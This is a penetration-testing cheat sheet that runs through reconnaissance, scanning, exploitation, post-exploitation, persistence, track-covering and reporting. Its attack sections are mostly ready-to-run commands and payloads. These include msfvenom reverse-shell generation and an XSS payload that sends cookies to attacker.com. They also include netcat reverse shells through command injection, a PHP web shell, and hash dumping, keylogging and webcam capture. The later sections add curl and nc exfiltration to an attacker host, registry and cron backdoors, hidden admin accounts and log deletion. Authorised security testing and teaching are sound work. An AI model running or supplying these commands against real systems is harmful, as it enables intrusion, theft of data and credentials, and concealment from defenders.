Penetration Testing Tools Guide

Table of Contents

1. Phase 1: Pre-Engagement & Planning
   • Methodologies & Standards
2. Phase 2: Footprinting (Reconnaissance)
   • OSINT Sources
   • Reconnaissance Tools
   • Google Hacking
3. Phase 3: Fingerprinting (Scanning & Enumeration)
   • Host Identification
   • Port Scanning
   • Vulnerability Scanning
   • Enumeration
     • Banner Grabbing & OS Fingerprinting
     • SMB, DNS, SMTP, SNMP Enumeration
4. Phase 4: Exploitation
   • Metasploit Framework
   • Exploit Development
   • Client-Side Exploitation
   • Password Attacks
   • Web Exploitation
     • SQL Injection
     • XSS
     • CSRF
     • Command Injection
     • File Upload Vulnerabilities
   • Privilege Escalation
     • Linux Privilege Escalation
     • Windows Privilege Escalation
5. Phase 5: Post-Exploitation
   • Information Gathering
   • Lateral Movement
   • Data Exfiltration
6. Phase 6: Persistence & Covering Tracks
   • Persistence Mechanisms
   • Covering Tracks
   • Anonymization
7. Phase 7: Reporting
8. Additional References

---

1. Phase 1: Pre-Engagement & Planning

Methodologies & Standards

Methodology	Description
PTES	Penetration Testing Execution Standard - detailed technical framework
NIST 800-115	4 phases: Planning, Discovery, Attack, Reporting
OSSTMM	Open Source Security Testing Methodology Manual
OWASP	Web Application Security - includes ASVS standard

Resource: http://www.pentest-standard.org

---

2. Phase 2: Footprinting (Reconnaissance)

Overview

Passive and active information gathering: network ranges, services, users, employees, software versions.

OSINT Sources

• Company websites, job postings, social networks
• Financial databases (EDGAR)
• Google Hacking / Dorks

Tools

Tool	Purpose	Usage
WHOIS	Domain registration info	whois domain.com
Maltego	Visualize data relationships	GUI tool
theHarvester	Gather emails, subdomains, IPs	theHarvester -d microsoft.com -l 500 -b google
FOCA	Extract document metadata	GUI tool
Shodan	Search internet-connected devices	Web/CLI

Google Hacking Database

• http://www.hackersforcharity.org/ghdb/
• Example: site:target.com filetype:pdf

---

3. Phase 3: Fingerprinting (Scanning & Enumeration)

Overview

Direct interaction with targets to discover services, OS versions, and vulnerabilities.

3.1 Scanning - Host Identification

Tool	Usage
Nmap	nmap -sn 192.168.0.0/24
Fping	fping -a -g 192.168.0.0/24
ARPScan	arp-scan -l
dnsenum	dnsenum domain.com

---

3.2 Scanning - Port Scanning

TCP Scan Types (Nmap)

Scan Type	Option	Description
TCP SYN	-sS	Stealth scan (most popular)
TCP Connect	-sT	Full connection (leaves logs)
UDP	-sU	UDP scanning (slower)
ACK	-sA	Firewall rule mapping

Essential Nmap Commands

# Discovery
nmap -sn 192.168.0.0/24          # Ping sweep
nmap -Pn 192.168.0.1             # Skip ping

# Scanning
nmap -sS 192.168.0.1             # SYN scan
nmap -p- 192.168.0.1             # All ports
nmap -sV 192.168.0.1             # Service detection
nmap -O 192.168.0.1              # OS detection
nmap -A 192.168.0.1              # Aggressive scan

---

3.3 Vulnerability Scanning

Tool	Type	Usage
Nessus	Commercial	Web GUI at https://localhost:8834
OpenVAS	Open Source	gvm-start
Lynis	Linux auditing	lynis audit system -Q

---

3.4 Enumeration

Banner Grabbing

telnet 192.168.0.1 80           # Manual
nc 192.168.0.1 80               # Netcat
nmap -sV 192.168.0.1            # Automated

OS Fingerprinting

OS	TTL	TCP Window
Linux	64	5840
Windows 7/10	128	8192
Cisco IOS	255	4128

SMB Enumeration (Windows/Samba Shares)

nbtscan -r 192.168.0.0/24
enum4linux -v -a 192.168.0.101

SMTP/SNMP Enumeration

smtp-user-enum -M VRFY -U users.txt -t 192.168.0.1
snmp-check 192.168.0.101

---

4. Phase 4: Exploitation

4.1 Metasploit Framework

Startup

msfdb init
msfconsole

Payloads

Types:

• Shell: Basic command shell
• Meterpreter: Advanced post-exploitation
• Bind: Listen on target
• Reverse: Connect back (firewall bypass)
• Staged: Two-stage delivery (/)
• Single: All-in-one (_)

Common Commands

search <vulnerability>
use exploit/<path>
show options
set RHOST <target>
set LHOST <attacker>
set PAYLOAD <payload>
exploit

# Sessions
sessions -l
sessions -i 1

Meterpreter Essentials

sysinfo / getuid / ps / migrate <PID>
download/upload <file>
getsystem / hashdump
run persistence -X -i 60 -p 4444 -r <IP>

Payload Generation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o payload.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o payload

---

4.2 Exploit Development

Workflow

1. Fuzzing → 2. Analysis → 3. Offset Finding → 4. Bad Characters → 5. Return Address → 6. Shellcode → 7. Testing

# Pattern creation/offset
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP>

---

Client-Side Exploitation

Browser Exploitation

use exploit/windows/browser/ms10_002_aurora
use auxiliary/server/browser_autopwn

BeEF (Browser Exploitation Framework)

beef-xss
# Default: http://127.0.0.1:3000/ui/panel (beef:beef)

Document Exploits

# PDF
use exploit/windows/fileformat/adobe_pdf_embedded_exe

# Office Macro
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba

---

Password Attacks

Online Attacks

Hydra:

hydra -l <user> -P wordlist.txt ssh://<IP>
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

Offline Attacks

Hash Acquisition:

# Windows (Metasploit)
meterpreter > hashdump

# Linux
cat /etc/shadow

Cracking:

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=nt hashes.txt

# Hashcat
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a    # Brute force

Wordlist Generation

cewl <URL> -w wordlist.txt                      # Spider website
crunch 8 8 0123456789 -o numbers.txt            # Generate combinations

---

Web Exploitation

SQL Injection

# Detection
?id=1' OR '1'='1

# UNION-based
' UNION SELECT NULL,username,password FROM users--

# Time-based blind
' AND IF(1=1, SLEEP(5), 0)--

Tool:

sqlmap -u "http://target/page.php?id=1"

Cross-Site Scripting (XSS)

Payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<script>fetch('http://attacker.com/steal?c='+document.cookie);</script>

Tool:

xsser -u "http://target/page?q=XSS"

Cross-Site Request Forgery (CSRF)

<img src="http://bank.com/transfer?amount=6000&to=attacker" hidden>

Defense: CSRF tokens

Command Injection

# Vulnerable: system("ping -c 4 " . $_GET['ip']);
?ip=127.0.0.1; cat /etc/passwd
?ip=127.0.0.1 | nc attacker 4444 -e /bin/bash

File Upload Vulnerabilities

Bypass techniques:

shell.php.jpg
shell.php5, shell.phtml
Content-Type: image/jpeg

Web Scanning Tools

nikto -h http://target
wpscan --url http://target --enumerate u
gobuster dir -u http://target -w wordlist.txt

Web Shells

<?php system($_GET['cmd']); ?>

weevely generate password shell.php
weevely http://target/shell.php password

---

Privilege Escalation

Linux Privilege Escalation

Enumeration:

# Automated
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
./linpeas.sh

# Manual
sudo -l
find / -perm -u=s -type f 2>/dev/null       # SUID
getcap -r / 2>/dev/null                      # Capabilities
cat /etc/crontab                             # Cron jobs

Exploitation:

# SUID binary (GTFOBins: https://gtfobins.github.io/)
find /etc/passwd -exec /bin/bash -p \;

# Sudo misconfiguration
sudo find /etc/passwd -exec /bin/bash \;

Windows Privilege Escalation

Enumeration:

# Automated
.\winPEAS.exe

# Manual
whoami /priv
systeminfo
wmic qfe                                     # Patches
sc query                                     # Services

Exploitation:

# Token impersonation (Meterpreter)
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

# getsystem
meterpreter> getsystem

---

5. Phase 5: Post-Exploitation

Local Information Gathering

# File search
meterpreter> search -f *password*
meterpreter> search -f id_rsa

# Keylogging
meterpreter> keyscan_start
meterpreter> keyscan_dump

# Credentials
meterpreter> run post/windows/gather/credentials/winscp
meterpreter> run post/windows/gather/enum_chrome

# Screenshots
meterpreter> screenshot
meterpreter> webcam_snap

---

Lateral Movement

Credential Re-use

PSExec:

# Metasploit
use exploit/windows/smb/psexec
set SMBUser <user>
set SMBPass <password>

# Impacket
psexec.py domain/user:password@target

Pass-the-Hash

# Metasploit
set SMBPass <LM_hash>:<NTLM_hash>

# Impacket
psexec.py -hashes <LM>:<NTLM> domain/user@target

Pivoting

Metasploit Route:

meterpreter> run autoroute -s 192.168.0.0/24
msf> route add 192.168.0.0 255.255.255.0 <session_id>

SOCKS Proxy:

# Meterpreter
use auxiliary/server/socks4a
run

# ProxyChains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 192.168.0.0/24

---

Data Exfiltration

Methods

# TCP
nc -lvnp 4444 > received.zip                 # Attacker
nc attacker_ip 4444 < data.zip               # Victim

# HTTP
curl -X POST -F "file=@data.zip" http://attacker/upload

# DNS (Iodine)
iodined -f -c -P password 10.0.0.1 tunnel.domain.com    # Attacker
iodine -f -P password tunnel.domain.com                 # Victim

---

6. Phase 6: Persistence & Covering Tracks

Startup Scripts

Windows Registry:

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

Linux:

crontab -e
# Add: @reboot /path/to/backdoor.sh

Adding Users

# Windows
net user hacker Pass123! /add
net localgroup Administrators hacker /add

# Linux
sudo useradd -m -s /bin/bash hacker
sudo usermod -aG sudo hacker

Backdoors

# Meterpreter persistence
meterpreter> run persistence -U -i 5 -p 4444 -r attacker_ip

---

Covering Tracks

Hide Source IP

TOR:

sudo apt install tor
torify curl http://check.torproject.org

ProxyChains:

sudo nano /etc/proxychains.conf
# Add: socks4 127.0.0.1 9050
proxychains nmap -sT target.com

Delete Logs

# Windows
meterpreter> clearev
wevtutil cl Security

# Linux
sudo rm -rf /var/log/*
history -c

Rootkits

Detection tools:

rkhunter --check      # Linux
chkrootkit            # Linux

Hide Files

Windows ADS:

type secret.zip > readme.txt:secret.zip
start C:\readme.txt:secret.zip

Linux:

mv backdoor .hidden_backdoor

---

7. Phase 7: Reporting

A comprehensive penetration test report should include:

1. Executive Summary - High-level findings for management
2. Methodology - Standards and frameworks used
3. Scope - Systems and networks tested
4. Findings - Detailed vulnerabilities with severity ratings (CVSS)
5. Evidence - Screenshots, command outputs, exploitation proof
6. Risk Assessment - Impact and likelihood analysis
7. Remediation - Specific mitigation recommendations
8. Conclusion - Overall security posture assessment

---

References

Essential Tools & Frameworks

• Metasploit: https://www.metasploit.com
• Impacket: https://github.com/SecureAuthCorp/impacket
• CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
• BloodHound: https://github.com/BloodHoundAD/BloodHound
• Mimikatz: https://github.com/gentilkiwi/mimikatz
• Empire: https://github.com/BC-SECURITY/Empire

Wordlists

• SecLists: https://github.com/danielmiessler/SecLists
• RockYou: /usr/share/wordlists/rockyou.txt
• CrackStation: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

Knowledge Bases

• GTFOBins: https://gtfobins.github.io/
• GHDB: http://www.hackersforcharity.org/ghdb/
• OWASP: https://owasp.org
• PTES: http://www.pentest-standard.org

---